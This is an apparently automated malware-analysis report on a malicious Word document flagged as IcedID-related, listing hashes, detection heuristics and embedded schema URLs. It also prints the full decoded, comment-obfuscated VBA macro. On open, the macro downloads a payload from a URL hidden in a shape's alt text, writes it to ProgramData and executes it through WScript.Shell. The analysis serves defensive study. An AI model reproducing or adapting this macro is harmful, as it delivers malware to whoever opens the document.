Office (OOXML) malware analysis — malicious · ebded4f9fc665b85

MALICIOUS

Office (OOXML)

141.2 KB Created: 2020-10-13 10:55:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-10-16

MD5: 3e926f77f36429de85765af1657a91d9 SHA-1: 4c51a439a3fc8ffa65f01c5ece68443b9361f78f SHA-256: ebded4f9fc665b85d1012c1796027f320f79c56a901effbb1ed16ee8b77a2e2b

230 Risk Score

Heuristics 6

ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set oknec = CreateObject("Script" + GHXgQ)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	12282 bytes
SHA-256: `f75907f2541a3d6bedcdeee839973f9f5b0a8ec6e37788edaba89e44bf2bf4cb`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "YJWeH" Sub sfVeF(XFRCW, Optional ByVal eqPPB As String = "c:\programdata\MNpGJ.txt", Optional ByVal GHXgQ As String = "ing.FileSystemObject") ' Railes initially ' Polite finalists quarrymen ' Latches slag purchased ' Bewilder reflectively ' Undervalues wildebeest skirmish eluding overestimated ' Attacker fashioning enclosing ' Choreographing expansions hypothetically ' Abbreviate ethicist floated hatstands ' Banished halved chrysanthemum raster ventricle ' Bosses ' Streets meadow entangle waifs cysts tabloids steeds ' Scatters tilled remotest gainsay ' Softens ' Subordinate prison tallish topologist ' Formless nozzles presupposition bagmen ' Tyrannic cryptic howsoever mirthless ' Insulin earmarking ' Mealy adaptable humanitarian Set oknec = CreateObject("Script" + GHXgQ) ' Demolishing agitations reiterating ' Diode ' Lazier acid swooned jeopardising ' Adjourns ' Burned sodomites nagging ' Lacs heedless heartbreaks ugliness ' Paeony prettify fainthearted mingle replicate Set nYrMX = oknec.CreateTextFile(eqPPB) ' Winch again smalltown unlearned ' Pulsations outlawing cork analytic ' Swingers cricketing ' Geologists allocated nYrMX.WriteLine XFRCW ' Satirised gossamer biliary ' Incapability glycerol necessitating articulations trailer ' Mating wristwatch ' Burps botulism ' Quarrelled bookseller ' Undervalues cruelty proclaims ' Calmest nYrMX.Close ' Rider maisonette bathhouse typhoon encyclopedic ' Hardening fences slanted ' Bates lambasted pip ' Settler alternation cafeteria ' Boastful attender biased skippered intensively obituaries undistinguished ' Assisted offshore ' Uneasiest unspeakably ninefold ' Sweetness scabs oddness superstitiously ' Polar aspidistra mouthpiece ' Lowspirited apples whooping identity ' Induna pawing absolutely ' Expended mistrustful ' Batmen dukedoms recompenses ' Indemnity syncretic outfoxed apery vorticity taxonomist hoarder ' Trafficked searching flawlessly ' Keynote searched ' Insinuating denomination conditionals ' Noradrenaline goats wapitis transfusion amplitude ' Picaresque ' Knives gilding phenomenologically briers intricately ' Dried burly ' Passant heaters torturer ' Everpresent abscess ' Condor worsens translator ' Deprecating brooches venison ' Slowly worthlessness scopes dreariness streamers ' Gang sleazier opportunist ' Attestation elfin redrawn guessing deepens ' Echo ' Sackful cornet calcify lurker munches ' Impulsion pinkness shiner ' Stagecoaches exemplification snowman thereafter ' Medicinal shrivels renumbering ' Proportioned confessing ' Buttercup refiner analyses ' Barging determine ' Severely randomly diathermy quartiles ' Tolerantly delivery bargains totters candies ' Bobbies killing spit services ' Majolica End Sub ' Nightwatchman defames founder ' Forefront undifferentiated pried kneaded ' Pigments unboiled ' Doornail croft lifelike protestantism ' Graves occupancies ' Broadens alpacas ' Skip trickier Sub AutoOpen() ' Aperiodically reconnoitring surlily jellify bleeped oxygen cuddliest ' Sensitisers ' Distrusting impromptu achingly indignantly foreshores interlaced ' Downstream cleanest ' Extortionately smokes sexy ' Warrant blinking garret writings ' Murmurings assiduously beholders ' Ovoid manna ' Disavow ' Intensifying varied ' Busking paddocks quarrymen prints cleanshaven ' Mastership aerofoil telegraphic ' Azalea discontinuation ' Coauthoring ' Volcano impales alveoli miner studying ' Rowed meteor breezing heterodoxy ' Rad trivially bradawl ' Bestknown brainteasing megaton ' Loaf seated clothespegs ' Crime intuited ' Dampening auctioneer ' Frequent transporters actinides trajectory squandered veiled triangulating ' Molehill truncated yes ' Ecosystem vocalisation ' Ambassadors operationally throttles slap discolour ' Rabbiting uprating teabag Dim qmEVO As New JyFrJ ' Dioxins vertices perpendicular lander ' Corkage ' Underachieving ' Supper brainier insinuating mountains anarchism ' Hindered openers nogging swampiest ' Breeders tweeter ' Defenders bestirred obliteration flannels ' Fantastic stirrer XFRCW = qmEVO.Ibgof("MSXML2.serverXMLHTTP") ' Seawards durban mishandles wholegrain suggestibility cypresses sloshing ' Flatly lacings ' Druggist marl finitely hatstands canticles cached ' Price perestroika ' Bradycardia aborigines blotch violators confessed ' Interchanging surely elegantly freed ' Jersey sneaks sirloins coalescence sfVeF ZVToT(XFRCW) ' Principalities ' Unsuited passably benefice eviscerate ' Snooker rho ' Donate acquittance argument ' Piggy boastful dazzling pithiest ' Remonstrations ' Pipit rugged ferny ' Triplets parenthesise ' Rate doodled invitations manicured condole skirts excavator xHhFv orKrI(0) + "vr32 c:\programdata\MNpGJ.txt", "ws" End Sub Function dOcXQ(NbJUS, hRXEd) ' Necessities antidote pyromaniac ' Figurehead change loftiness weanling ' Steepened corresponded bandwagons cadaverous ' Hearttoheart ext ' Responsively barnacles ' Promontory miraculously tiro phrenological stencilled ' Tricycle algebraic hyperbola apogee dOcXQ = Split(NbJUS, hRXEd) End Function Attribute VB_Name = "XqpTk" ' Decisive adumbrate shrewdest ' Psychiatry ' Splendour befuddle unsettle ' Comparators vegetarian fuddle ' Bartering striper ' Pooch paracetamol angora monopolisation ' Obstructively Function ZVToT(Yeppd) ' Outfits sloughed differently ' Monuments degenerating ' Parlourmaid contributions fridays aurally ' Bedouins exogenous wobbled ' Protuberances repined lexically ' Incautiously reformable abruptly ZVToT = StrConv(Yeppd, vbUnicode) ' Tortuous ' Springy town equating ' Trundling taipei tenures cattery ' Crevices ' Dimes thorax End Function ' Hearings interject fiefs ' Crises ' Grouper electrically repertory confiscations ' Industrial scrabbling obsessiveness rings Function uXtke() ' Radiogalaxies frogs gushes ' Ovulation ' Crotchetiness pity ' Exclude avoiding unappealing assessable safeness customs perspicacious invoice ' Elan developments allergens amplifying shrewdly ' Authenticating embargo ' Subroutines bevelling ' Chapters disciplined ' Deliverable interventionist auras unplug ' Resignation dispositions hauntingly els With ActiveDocument.shapes(1) uXtke = .AlternativeText End With End Function ' Semites affiliates cicada tactful ' Opponents ' Scrawnier graciousness balustrades ' Knotted zambia worried ' Assent gables Function orKrI(QMRnS) ' Citizen chemise incredibly iconographic breakers ' Scurry deaconess dejected daunting ' Participative diaphanous ' Beckon congresses cyclist taxpayers aperture ' Hieroglyphic fez circumcision ' Bow secretively blown ' Defaulter exposed ' Sunless personalisation instigator ' Maudlin dependence dogmatism mutuality ' Wastages spawning deepfried pellets ' Invigilating emblems pyrotechnics metalworking abraham convertor ' Sheaves maisonette unspent neurotically punk ' Impunity competing opportunism unorthodox WFuMz = uXtke() MyDhx = dOcXQ(WFuMz, "###") eJjiR = MyDhx(QMRnS) orKrI = eJjiR End Function Attribute VB_Name = "JyFrJ" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Function Reverse(Text) Dim i As Integer Dim StrNew As String Dim strOld As String strOld = Trim(Text) For i = 1 To Len(strOld) StrNew = Mid(strOld, i, 1) & StrNew Next i Reverse = StrNew End Function ' Moors commentaries negotiates ' Heralding centimes ' Bartender turfs accomplices bliss sits ' Piranhas downstairs oceanographic ' Crutch regenerate ' Sharp predictive ' Rigidly perennial Function Ibgof(OlcFW) ' Habituated gumboots endangering ' Tawdry ' Columnist skimped castors presumable boggles flexibly ' Surplice voluntary sooty misremembering selfdiscipline rainfall ' Ecliptic bunnies fijians depicts ' Looks sauces synthesising ' Rubicon mechanistic eggheads retrain Dim hyiyv As Object ' Newfound ' Manageable unorthodoxy wordprocessing ' Anion internationalists ' Foundations interleaves vamper wretchedness impossibly ' Shotgun friendlies symbolical ' Demo ' Cuticles glutton recording lopsided ' Odiums inhumanity expunges drowsier ' Sauciness supplicant injudiciously neglecting ' Nonviolence ' Pedimented Set hyiyv = CreateObject(OlcFW) ' Fumigating hopelessly probability ' Convulsively ' Church governess ' Ruefully facetiousness haltered profusely ' Occurrences ' Blubbering confuse lobbyists malta ' Tautologous swipe walkabouts ' Applied antenatal addles newt ' Exact unwinds ingathered hardship amortise ' Gazetteer immutability musician ' Tensely subset toughens replenishment surfs ' Eaters parabola ' Chin raise blackish insoluble ' Remix lipid urgings doe ' Clowning grimiest conspecific yawned translation vibrantly ' Validates carp hankers clips ' Socialising proofed ' Output toilette concordance manslaughter leniently ' Houseboat biographies respect indigo ' Withholds ' Monarchs barbaric findings MajCT = orKrI(1) ' Bahamas islanders ' Falseness ' Slugged unbounded spiky motivating intimidate disposer ' Quantised chesterfield doggedness countess ' Sapper weld originated hyiyv.Open "GET", Reverse(MajCT), False ' Miles tripod itemise counsellor ' Eeriest mod congratulates impoverishment ' Rabbi poises stapes ' Was sharing managers ' Emotionalism violators catatonic displays ' Tori seizing phew hyiyv.Send ' Plaiting scrimped ' Beech describe ' Illogic sinistral etymology activism apostrophes requital ' Gasometer protozoan nailed ' Garbage Ibgof = hyiyv.responsebody End Function Attribute VB_Name = "kYuTd" Sub xHhFv(Owlxd, CnjrD) ' Glued brewer champagnes cloaked wheatears ' Tinkled chaperoned ' Gusts poop allays gavotte ' Tons juxtaposition ' Multiplexers maw geologist sundries ' Retrospective repulsively bouquets retract ' Mitred priggishly Set JVhlx = CreateObject(CnjrD + "cript.shell") ' Evening smarts ' Westward plungers peacemaking thrillers ' Yetis magnums bouffant january ' Trestle unpreparedness rends wapitis foregrounding maul ' Relish glyphs categorises undeclared cloudscapes ' Blacklists spooled redrafting scimitars wetsuit saddlebags ' Postboxes aliquots sequence amusements ' Accelerators returnees retributive ' Secretive secularist elf restaurateurs ' Ogled ' Greatgrandmothers unsuspected printers admen pined ' Stumbles livening ' Standard accessories combines acclaim ' Amethystine spate crisper overreacted ' Grueling tables aches ' Piteous teetotallers purred subtlest ' Spotting hypnotherapists phospholipids ' Peakiness agonies ' Architrave nationalising raiment compartment ' Quart incinerate hydrous ' Tang bogey pyrite preview mice malayan ' Reformatting chequerboard wearily judicious thomas ' Belated beadle scales ' Magnate magnanimous enjoined cuboid authority ' Cytology reddens colloquia dozes undecided biotic ' Gaga seismologist ' Warplanes mull ' Projectionist scotch presumes ' Tuneless smacker ' Struggling blundered ' Weir clan philosophical mainline ' Lonesome reciprocation commission element exfoliation toxic rarest ' Bagpipe sandpaper shoppers retardation ' Meditates ' Tory ' Canteen temporary patriarchal venom ' Patriots neonates ' Sparking overlaying applet weasel fords ' Card vocalisations postponements cross-bun conspired ' Crosswind moleskin imprimatur alright ' Drew litany arrant ' Dolerite commemorations ' Coverlets gamete chuntering transistorised ' Moorland courting ringless finders ' Pacified endeared networks JVhlx.exec Owlxd ' Prolix squid environmentally boston garottes ' Sandals pacifying adulation ' Rota ' Keyboardist End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	45568 bytes
SHA-256: `a4d1352f9c7dd599d2b2d2a0ffe0dc582bfa245fe08b2a9472c2031d5f8d70b4`
Detection ClamAV: Doc.Macro.ICEID1020-9781212-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.